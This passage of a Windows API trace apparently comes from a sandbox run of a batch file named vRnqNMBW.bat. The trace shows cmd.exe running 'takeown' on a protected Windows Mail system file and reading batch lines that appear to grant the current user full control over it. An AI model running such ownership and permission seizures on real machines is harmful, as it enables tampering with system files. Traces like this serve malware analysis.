\"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xc6ee58*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc6eea4 | out: lpCommandLine="takeown /F \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\"", lpProcessInformation=0xc6eea4*(hProcess=0xb0, hThread=0xb8, dwProcessId=0x828, dwThreadId=0x3d0)) returned 1 [0280.988] CloseHandle (hObject=0xb8) returned 1 [0280.988] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0280.988] GetEnvironmentStringsW () returned 0xcbb300* [0280.989] FreeEnvironmentStringsA (penv="=") returned 1 [0280.989] WaitForSingleObject (hHandle=0xb0, dwMilliseconds=0xffffffff) returned 0x0 [0283.343] GetExitCodeProcess (in: hProcess=0xb0, lpExitCode=0xc6ee3c | out: lpExitCode=0xc6ee3c*=0x0) returned 1 [0283.343] CloseHandle (hObject=0xb0) returned 1 [0283.343] _vsnwprintf (in: _Buffer=0xc6ef24, _BufferCount=0x13, _Format="%08X", _ArgList=0xc6ee44 | out: _Buffer="00000000") returned 8 [0283.343] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0283.343] GetEnvironmentStringsW () returned 0xcbb300* [0283.343] FreeEnvironmentStringsA (penv="=") returned 1 [0283.343] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0283.343] GetEnvironmentStringsW () returned 0xcbb300* [0283.344] FreeEnvironmentStringsA (penv="=") returned 1 [0283.344] DeleteProcThreadAttributeList (in: lpAttributeList=0xc6eed0 | out: lpAttributeList=0xc6eed0) [0283.344] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.344] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0283.456] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.456] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0283.456] _get_osfhandle (_FileHandle=0) returned 0x38 [0283.456] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0283.456] SetConsoleInputExeNameW () returned 0x1 [0283.456] GetConsoleOutputCP () returned 0x1b5 [0283.456] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0283.456] SetThreadUILanguage (LangId=0x0) returned 0x409 [0283.456] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc6f664, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0283.457] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0283.457] _get_osfhandle (_FileHandle=3) returned 0xb0 [0283.457] SetFilePointer (in: hFile=0xb0, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0283.457] _get_osfhandle (_FileHandle=3) returned 0xb0 [0283.457] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0283.457] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc6f634, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xc6f634*=0xb3, lpOverlapped=0x0) returned 1 [0283.458] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0283.458] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=16, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0283.458] _get_osfhandle (_FileHandle=3) returned 0xb0 [0283.458] GetFileType (hFile=0xb0) returned 0x1 [0283.458] _get_osfhandle (_FileHandle=3) returned 0xb0 [0283.458] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0283.459] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui", nBufferLength=0x208, lpBuffer=0xc6edb0, lpFilePart=0xc6ed74 | out: lpBuffer="C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui", lpFilePart=0xc6ed74*="WinMail.exe.mui") returned 0x33 [0283.459] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0xc6eab8 | out: lpFindFileData=0xc6eab8) returned 0xcb09d8 [0283.459] FindClose (in: hFindFile=0xcb09d8 | out: hFindFile=0xcb09d8) returned 1 [0283.459] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0283.459] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Mail", lpFindFileData=0xc6eab8 | out: lpFindFileData=0xc6eab8) returned 0xcb09d8 [0283.459] FindClose (in: hFindFile=0xcb09d8 | out: hFindFile=0xcb09d8) returned 1 [0283.459] _wcsnicmp (_String1="WINDOW~2", _String2="Windows Mail", _MaxCount=0xc) returned 11 [0283.459] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Mail\\en-US", lpFindFileData=0xc6eab8 | out: lpFindFileData=0xc6eab8) returned 0xcb09d8 [0283.459] FindClose (in: hFindFile=0xcb09d8 | out: hFindFile=0xcb09d8) returned 1 [0283.459] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui", lpFindFileData=0xc6eab8 | out: lpFindFileData=0xc6eab8) returned 0xcb09d8 [0283.459] FindClose (in: hFindFile=0xcb09d8 | out: hFindFile=0xcb09d8) returned 1 [0283.460] _wcsicmp (_String1="set", _String2=")") returned 74 [0283.460] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0283.460] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0283.460] _wcsicmp (_String1="IF", _String2="set") returned -10 [0283.460] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0283.460] _wcsicmp (_String1="REM", _String2="set") returned -1 [0283.460] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0283.460] _tell (_FileHandle=3) returned 63 [0283.460] _close (_FileHandle=3) returned 0 [0283.460] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xc6f3f8 | out: _Buffer="\r\n") returned 2 [0283.460] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.460] GetFileType (hFile=0x3c) returned 0x2 [0283.460] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.461] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f3d0 | out: lpMode=0xc6f3d0) returned 1 [0283.463] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.463] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xc6f3e8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f3e8*=0x2) returned 1 [0283.464] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0283.464] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0283.464] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xc6f3f4 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0283.464] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xc6f3f4 | out: _Buffer=">") returned 1 [0283.464] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.464] GetFileType (hFile=0x3c) returned 0x2 [0283.464] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.464] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f3d4 | out: lpMode=0xc6f3d4) returned 1 [0283.464] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.464] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xc6f3ec, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xc6f3ec*=0x1e) returned 1 [0283.466] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.466] GetFileType (hFile=0x3c) returned 0x2 [0283.467] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.467] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f674 | out: lpMode=0xc6f674) returned 1 [0283.467] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.467] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xcc83c8*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xc6f68c, lpReserved=0x0 | out: lpBuffer=0xcc83c8*, lpNumberOfCharsWritten=0xc6f68c*=0x3) returned 1 [0283.467] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xc6f694 | out: _Buffer=" FN=\"WinMail.exe.mui\" ") returned 22 [0283.467] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.467] GetFileType (hFile=0x3c) returned 0x2 [0283.467] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.467] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f66c | out: lpMode=0xc6f66c) returned 1 [0283.467] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.467] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0xc6f684, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f684*=0x16) returned 1 [0283.468] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xc6f6a8 | out: _Buffer="\r\n") returned 2 [0283.468] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.468] GetFileType (hFile=0x3c) returned 0x2 [0283.468] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.468] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f680 | out: lpMode=0xc6f680) returned 1 [0283.468] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.468] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xc6f698, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f698*=0x2) returned 1 [0283.469] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0283.469] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0283.469] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0283.469] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0283.469] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0283.469] _wcsicmp (_String1="set", _String2="CD") returned 16 [0283.469] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0283.469] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0283.469] _wcsicmp (_String1="set", _String2="REN") returned 1 [0283.469] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0283.469] _wcsicmp (_String1="set", _String2="SET") returned 0 [0283.469] GetConsoleTitleW (in: lpConsoleTitle=0xc6f218, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0283.469] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0283.469] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0283.469] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0283.469] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0283.469] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0283.469] _wcsicmp (_String1="set", _String2="CD") returned 16 [0283.469] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0283.469] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0283.469] _wcsicmp (_String1="set", _String2="REN") returned 1 [0283.469] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0283.469] _wcsicmp (_String1="set", _String2="SET") returned 0 [0283.469] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0283.470] _wcsnicmp (_String1="FN", _String2="/A", _MaxCount=0x2) returned 55 [0283.470] _wcsnicmp (_String1="FN", _String2="/P", _MaxCount=0x2) returned 55 [0283.470] SetEnvironmentVariableW (lpName="FN", lpValue="\"WinMail.exe.mui\"") returned 1 [0283.470] GetEnvironmentStringsW () returned 0xcbb300* [0283.470] FreeEnvironmentStringsA (penv="=") returned 1 [0283.470] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.470] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0283.470] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.470] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0283.470] _get_osfhandle (_FileHandle=0) returned 0x38 [0283.470] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0283.470] SetConsoleInputExeNameW () returned 0x1 [0283.470] GetConsoleOutputCP () returned 0x1b5 [0283.471] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0283.471] SetThreadUILanguage (LangId=0x0) returned 0x409 [0283.471] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc6f664, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0283.472] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0283.472] _get_osfhandle (_FileHandle=3) returned 0xb0 [0283.472] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0283.472] _get_osfhandle (_FileHandle=3) returned 0xb0 [0283.472] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0283.472] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc6f634, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xc6f634*=0xa3, lpOverlapped=0x0) returned 1 [0283.472] SetFilePointer (in: hFile=0xb0, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0283.472] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0283.472] _get_osfhandle (_FileHandle=3) returned 0xb0 [0283.472] GetFileType (hFile=0xb0) returned 0x1 [0283.472] _get_osfhandle (_FileHandle=3) returned 0xb0 [0283.472] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0283.473] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x208, lpBuffer=0xc6edb0, lpFilePart=0xc6ed74 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0xc6ed74*="vRnqNMBW.bat") returned 0x2a [0283.473] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xc6eab8 | out: lpFindFileData=0xc6eab8) returned 0xcb09d8 [0283.473] FindClose (in: hFindFile=0xcb09d8 | out: hFindFile=0xcb09d8) returned 1 [0283.473] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xc6eab8 | out: lpFindFileData=0xc6eab8) returned 0xcb09d8 [0283.473] FindClose (in: hFindFile=0xcb09d8 | out: hFindFile=0xcb09d8) returned 1 [0283.473] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0283.473] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xc6eab8 | out: lpFindFileData=0xc6eab8) returned 0xcb09d8 [0283.473] FindClose (in: hFindFile=0xcb09d8 | out: hFindFile=0xcb09d8) returned 1 [0283.473] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFindFileData=0xc6eab8 | out: lpFindFileData=0xc6eab8) returned 0xcb09d8 [0283.473] FindClose (in: hFindFile=0xcb09d8 | out: hFindFile=0xcb09d8) returned 1 [0283.474] _wcsicmp (_String1="cd", _String2=")") returned 58 [0283.474] _wcsicmp (_String1="FOR", _String2="cd") returned 3 [0283.474] _wcsicmp (_String1="FOR/?", _String2="cd") returned 3 [0283.474] _wcsicmp (_String1="IF", _String2="cd") returned 6 [0283.474] _wcsicmp (_String1="IF/?", _String2="cd") returned 6 [0283.474] _wcsicmp (_String1="REM", _String2="cd") returned 15 [0283.474] _wcsicmp (_String1="REM/?", _String2="cd") returned 15 [0283.474] _tell (_FileHandle=3) returned 78 [0283.474] _close (_FileHandle=3) returned 0 [0283.474] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xc6f3f8 | out: _Buffer="\r\n") returned 2 [0283.474] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.474] GetFileType (hFile=0x3c) returned 0x2 [0283.474] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.474] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f3d0 | out: lpMode=0xc6f3d0) returned 1 [0283.475] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.475] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xc6f3e8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f3e8*=0x2) returned 1 [0283.475] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0283.475] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0283.475] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xc6f3f4 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0283.475] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xc6f3f4 | out: _Buffer=">") returned 1 [0283.475] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.475] GetFileType (hFile=0x3c) returned 0x2 [0283.475] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.475] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f3d4 | out: lpMode=0xc6f3d4) returned 1 [0283.475] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.475] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xc6f3ec, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xc6f3ec*=0x1e) returned 1 [0283.476] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.476] GetFileType (hFile=0x3c) returned 0x2 [0283.476] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.476] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f674 | out: lpMode=0xc6f674) returned 1 [0283.476] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.476] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xcc8308*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xc6f68c, lpReserved=0x0 | out: lpBuffer=0xcc8308*, lpNumberOfCharsWritten=0xc6f68c*=0x2) returned 1 [0283.476] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xc6f694 | out: _Buffer=" /d \"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\\" ") returned 37 [0283.476] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.476] GetFileType (hFile=0x3c) returned 0x2 [0283.476] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.476] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f66c | out: lpMode=0xc6f66c) returned 1 [0283.477] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.477] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0xc6f684, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f684*=0x25) returned 1 [0283.477] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xc6f6a8 | out: _Buffer="\r\n") returned 2 [0283.477] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.477] GetFileType (hFile=0x3c) returned 0x2 [0283.477] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.477] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f680 | out: lpMode=0xc6f680) returned 1 [0283.477] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.477] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xc6f698, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f698*=0x2) returned 1 [0283.477] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0283.477] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0283.477] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0283.478] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0283.478] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0283.478] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0283.478] GetConsoleTitleW (in: lpConsoleTitle=0xc6f218, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0283.478] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0283.478] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0283.478] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0283.478] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0283.478] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0283.478] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0283.478] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0283.478] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0283.478] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xc6efd0, nVolumeNameSize=0x104, lpVolumeSerialNumber=0xc6efc8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xc6efc8*=0xd2ca4def, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0283.479] _wcsnicmp (_String1="/d", _String2="/D", _MaxCount=0x2) returned 0 [0283.479] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xc6ed74 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0283.479] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", nBufferLength=0x104, lpBuffer=0xc6ed74, lpFilePart=0xc6ed6c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpFilePart=0xc6ed6c*=0x0) returned 0x1e [0283.479] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0283.479] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xc6eaf0 | out: lpFindFileData=0xc6eaf0) returned 0xcbcb90 [0283.479] FindClose (in: hFindFile=0xcbcb90 | out: hFindFile=0xcbcb90) returned 1 [0283.479] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xc6eaf0 | out: lpFindFileData=0xc6eaf0) returned 0xcbcb90 [0283.479] FindClose (in: hFindFile=0xcbcb90 | out: hFindFile=0xcbcb90) returned 1 [0283.479] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0283.479] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xc6eaf0 | out: lpFindFileData=0xc6eaf0) returned 0xcbcb90 [0283.479] FindClose (in: hFindFile=0xcbcb90 | out: hFindFile=0xcbcb90) returned 1 [0283.479] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0283.479] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0283.479] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0283.480] GetEnvironmentStringsW () returned 0xcbb300* [0283.480] FreeEnvironmentStringsA (penv="=") returned 1 [0283.480] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0283.480] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.480] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0283.480] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.480] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0283.480] _get_osfhandle (_FileHandle=0) returned 0x38 [0283.480] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0283.481] SetConsoleInputExeNameW () returned 0x1 [0283.481] GetConsoleOutputCP () returned 0x1b5 [0283.481] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0283.481] SetThreadUILanguage (LangId=0x0) returned 0x409 [0283.481] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc6f664, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0283.481] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0283.481] _get_osfhandle (_FileHandle=3) returned 0xb0 [0283.481] SetFilePointer (in: hFile=0xb0, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0283.482] _get_osfhandle (_FileHandle=3) returned 0xb0 [0283.482] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 